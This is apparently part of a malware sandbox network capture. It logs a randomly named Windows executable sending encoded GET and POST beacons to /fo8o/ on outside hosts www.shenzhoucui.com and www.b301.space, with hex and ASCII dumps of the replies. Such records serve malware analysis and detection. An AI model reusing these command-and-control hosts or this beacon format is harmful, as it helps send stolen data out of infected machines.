Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t\|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP<<e%03\|cn6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6R]A??m/33.6%x+;hp89RQ{=~f>7Ano_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49782	104.206.198.212	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:51.315627098 CEST	499	OUT	GET /fo8o/?qD=FrMTb&aZ=CKPof6WmPR8MjyGnH4DbgoSrXD0BQRGHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBUQctCnxeEn1N6dSVAag1SvMAJrrC6MpwI5I= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.shenzhoucui.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:17:52.991121054 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 08 Jun 2024 16:17:54 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Data Raw: 35 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 27 e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 27 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 [TRUNCATED] Data Ascii: 58c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>app9570-\|</title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title='app9570-\|'>app9570-\|</a></h1><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>/fo8o/?qD=FrMTb&aZ=CKPof6WmPR8MjyGnH4DbgoSrXD0BQRGHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBUQctCnxeEn1N6dSVAag1SvMAJrrC6MpwI5I=</td></tr><tr><td>Server:</td><td>prod-qwmh-bj7-pool202-frontend-static-01</td></tr><tr><td>Date:</td><td>2024/06/09 00:17:52</td></tr></table><hr><center>tengine</center><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/shenzhoucui.com.xml" target="_blank">XML </a> \| <a href="/shenzhoucui.com.html" targe [TRUNCATED]
Jun 8, 2024 18:17:52.991267920 CEST	402	IN	Data Raw: 20 e5 9c b0 e5 9b be 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 76 61 Data Ascii: </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src = 'http:/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49783	194.58.112.174	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:58.088515997 CEST	761	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.b301.space Origin: http://www.b301.space Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.b301.space/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 37 70 55 4e 41 44 38 34 4b 70 64 35 32 47 7a 54 71 76 67 75 33 31 66 65 75 62 46 52 76 45 65 4f 41 68 4a 4b 75 79 37 2b 30 31 4f 33 37 41 38 46 68 74 6e 4d 6d 46 50 4d 2f 50 67 57 47 55 78 53 31 55 38 76 46 65 6d 61 61 78 6b 73 37 6b 63 48 73 4f 78 57 62 70 49 79 4c 6a 35 38 48 72 2b 75 4e 6a 51 67 77 6b 44 6e 63 39 44 44 6e 46 73 59 75 2f 4e 47 4e 2b 50 75 56 33 4c 54 79 6e 71 66 47 38 76 42 63 31 56 5a 6b 5a 48 4c 62 66 45 30 36 48 42 56 48 4d 2b 75 59 6f 35 48 6f 43 72 39 66 67 59 6f 48 79 51 43 41 78 4a 30 31 35 46 5a 33 67 67 64 6a 41 3d 3d Data Ascii: aZ=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O37A8FhtnMmFPM/PgWGUxS1U8vFemaaxks7kcHsOxWbpIyLj58Hr+uNjQgwkDnc9DDnFsYu/NGN+PuV3LTynqfG8vBc1VZkZHLbfE06HBVHM+uYo5HoCr9fgYoHyQCAxJ015FZ3ggdjA==
Jun 8, 2024 18:17:58.966310978 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 08 Jun 2024 16:17:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED] Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRIA;c-[fH{c\eG4#X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".\|>w/PuAAxv&W;o(Y]rVaF%uhUVV x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXlN#wxRS,}/nDo [TRUNCATED]
Jun 8, 2024 18:17:58.966336012 CEST	1236	IN	Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38 Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF[ y[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB\| .E$3i
Jun 8, 2024 18:17:58.966355085 CEST	1236	IN	Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4 Data Ascii: Jd$dU+3'9eQ(_LZ$sYp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J\Aofe.KJwd$+z(8"{F\4j*&Q@[\|
Jun 8, 2024 18:17:58.966368914 CEST	110	IN	Data Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18 Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49784	194.58.112.174	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:00.625327110 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.b301.space Origin: http://www.b301.space Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.b301.space/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 4f 4f 4f 6b 74 4b 74 33 48 2b 31 31 4f 33 6a 77 38 4d 73 4e 6e 35 6d 46 44 75 2f 4b 59 57 47 53 64 53 31 57 30 76 46 70 79 56 62 68 6b 71 69 30 63 46 69 75 78 57 62 70 49 79 4c 6a 74 57 48 71 57 75 4d 58 55 67 77 47 72 6b 56 64 44 43 7a 56 73 59 71 2f 4e 43 4e 2b 50 59 56 31 2b 45 79 6c 53 66 47 39 66 42 63 67 30 50 74 5a 48 4a 52 2f 45 6c 35 45 70 52 42 76 53 6b 57 71 4a 46 33 44 57 66 54 47 4a 79 57 44 78 56 53 78 74 48 6f 2b 4d 74 36 6a 64 55 34 48 51 73 55 43 41 78 30 48 54 76 55 2b 79 7a 7a 6b 46 32 33 2b 6b 3d Data Ascii: aZ=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyOOOktKt3H+11O3jw8MsNn5mFDu/KYWGSdS1W0vFpyVbhkqi0cFiuxWbpIyLjtWHqWuMXUgwGrkVdDCzVsYq/NCN+PYV1+EylSfG9fBcg0PtZHJR/El5EpRBvSkWqJF3DWfTGJyWDxVSxtHo+Mt6jdU4HQsUCAx0HTvU+yzzkF23+k=
Jun 8, 2024 18:18:01.501897097 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 08 Jun 2024 16:18:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED] Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRIA;c-[fH{c\eG4#X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".\|>w/PuAAxv&W;o(Y]rVaF%uhUVV x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXlN#wxRS,}/nDo [TRUNCATED]
Jun 8, 2024 18:18:01.501951933 CEST	1236	IN	Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38 Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF[ y[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB\| .E$3i
Jun 8, 2024 18:18:01.501995087 CEST	1236	IN	Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4 Data Ascii: Jd$dU+3'9eQ(_LZ$sYp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J\Aofe.KJwd$+z(8"{F\4j*&Q@[\|
Jun 8, 2024 18:18:01.502027988 CEST	110	IN	Data Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18 Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49785	194.58.112.174	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:03.156950951 CEST	10863	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.b301.space Origin: http://www.b301.space Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.b301.space/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 47 4f 4f 57 6c 4b 75 51 54 2b 76 31 4f 33 39 41 38 42 73 4e 6e 6b 6d 46 62 71 2f 4b 6b 6f 47 58 42 53 30 31 73 76 55 6f 79 56 52 68 6b 71 71 55 63 59 73 4f 78 6d 62 6f 6b 2b 4c 6a 39 57 48 71 57 75 4d 52 34 67 35 30 44 6b 54 64 44 44 6e 46 73 45 75 2f 4e 71 4e 2b 47 74 56 31 71 55 79 56 79 66 46 64 50 42 65 55 55 50 6d 5a 48 48 57 2f 46 34 35 45 30 50 42 75 2f 62 57 71 52 72 33 44 79 66 44 77 6f 49 47 77 49 4a 42 52 46 46 72 63 41 4e 31 43 70 51 31 33 30 32 59 51 55 31 71 30 76 43 62 65 4c 70 71 6c 4e 76 6b 4c 36 2f 41 77 74 36 38 6b 6c 6d 7a 72 64 76 57 42 64 47 35 6c 39 46 33 4a 44 4e 4e 41 42 66 69 31 6d 75 51 6a 65 30 67 68 6a 34 6e 4c 43 57 47 7a 52 38 61 48 4c 49 70 73 76 70 6e 31 37 69 48 75 42 55 38 2f 67 35 50 7a 54 4a 76 4a 6a 54 49 43 53 6b 4c 42 41 31 50 69 6d 30 6d 4d 6d 41 77 34 78 66 39 44 54 6d 4a 4d 42 39 39 7a 2b 52 53 58 4e 2b 6b 44 6e 44 4e 75 44 [TRUNCATED] Data Ascii: aZ=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyGOOWlKuQT+v1O39A8BsNnkmFbq/KkoGXBS01svUoyVRhkqqUcYsOxmbok+Lj9WHqWuMR4g50DkTdDDnFsEu/NqN+GtV1qUyVyfFdPBeUUPmZHHW/F45E0PBu/bWqRr3DyfDwoIGwIJBRFFrcAN1CpQ1302YQU1q0vCbeLpqlNvkL6/Awt68klmzrdvWBdG5l9F3JDNNABfi1muQje0ghj4nLCWGzR8aHLIpsvpn17iHuBU8/g5PzTJvJjTICSkLBA1Pim0mMmAw4xf9DTmJMB99z+RSXN+kDnDNuDAToru4pYuygsXxq1WJVKBLKDdKnZFhU8ycT/uafLntJFIigCWztET0Cv0F9cKmFHVu+m9kedBFhkkuzXyA37MUqpL/Fv/EE2uO9b7tvyXY+RbxbpIe/aPWRKYrOMF7q+svTni8K54XtqpHKLhzFVXgG5BrEXv/sCIVuMdBzX22F+c2Ey+laWt3f69hMFoML5Hpr16043Hlxgl6J4kaJcCxhRSnatesvZywtkXwolt+JYYkD8VEpmn7xL+8Y+Sb+XLkCvq1sLcgfXLTW0B5R3AWJalafcLvmIxmhVjwTlQB1Pa+GQgLBH+lVmSuGQkxghSJkfmyJd8I7enZvWLD2Xn6AbCGh2jGyHkouNMNjymB8kEM4LFtTk0y3Mx85PeH2EWTuN/He0l5/J4HBKhAzGIJ5JkjgAbXhKvrpy3oKo/NR1jh7ZNqJGvQwNu0owJzPWVV9axXAdv74eCOplbZGGLtoLADK6SzjO4BN7HWsZxV7GHK0SXBrqfVTGFByWcHPrJmjXv/Ow+Vze9gbIZmMiU/pIXBOBKrz1LiR2hqPPmnBSRzl3RvkzxBRtKkVg+s+pw/yirafCkKAhH0c4ampyiHwMzc8Waj/8MBO1fX+vyvcz2/UO4VfhiStEOu4IYmwXZs/wmLpEBVtZFJ6MIlOW8FU7jKiFHnDaZ/ [TRUNCATED]
Jun 8, 2024 18:18:04.037821054 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 08 Jun 2024 16:18:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED] Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRIA;c-[fH{c\eG4#X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".\|>w/PuAAxv&W;o(Y]rVaF%uhUVV x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXlN#wxRS,}/nDo [TRUNCATED]
Jun 8, 2024 18:18:04.037868977 CEST	212	IN	Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38 Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF[ y[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j
Jun 8, 2024 18:18:04.037905931 CEST	1236	IN	Data Raw: e5 b4 3f c8 82 a7 cc 73 d0 42 ff 93 7c 84 15 ed c4 0f 20 db 2e 16 82 45 24 b7 05 a5 33 69 01 12 1c 76 cc b4 82 22 26 2d 78 07 ff 1f d0 1a b3 50 0a 0d 24 9f b2 16 d8 97 a1 a5 f8 7b a8 05 6d 7f f8 f5 fe 1b 73 93 35 18 8c 07 ad f6 4f c9 17 a9 59 ef Data Ascii: ?sB\| .E$3iv"&-xP${ms5OY5e2Am,bkci+1c-OX%(_X5,i @HF4dc`Fs]:m35RrKG!1.prH[-Im
Jun 8, 2024 18:18:04.037941933 CEST	1134	IN	Data Raw: 28 fc 38 eb a2 22 a8 dc e4 7b 46 5c 34 e0 6a a0 2a 26 1b 51 fb 40 e1 b4 cd 5b 9e e8 7c fd c8 c4 d7 f1 58 b8 a8 68 39 9d 99 e3 6c ca 40 d0 19 7f 88 2b 53 5c 59 0f fb b8 40 32 7f 37 54 c1 68 55 b9 20 7d 3f 38 eb ba 15 51 96 65 51 9d 9c 8d a4 58 f7 Data Ascii: (8"{F\4j&Q@[\|Xh9l@+S\Y@27ThU }?8QeQXKc8u=Pr,7%.MzR&)6ub(/KNjr~9'<iqm+>1~dY7\Eur!tn0>#T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49786	194.58.112.174	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:18:05.687838078 CEST	494	OUT	GET /fo8o/?aZ=AU3XYvZFaGSlytwpVw8yOp8P3DTmtaA+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBKF09gVMhv/0PQsBNVEJ3Y6D3Cho3zWe+YcQ=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.b301.space Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
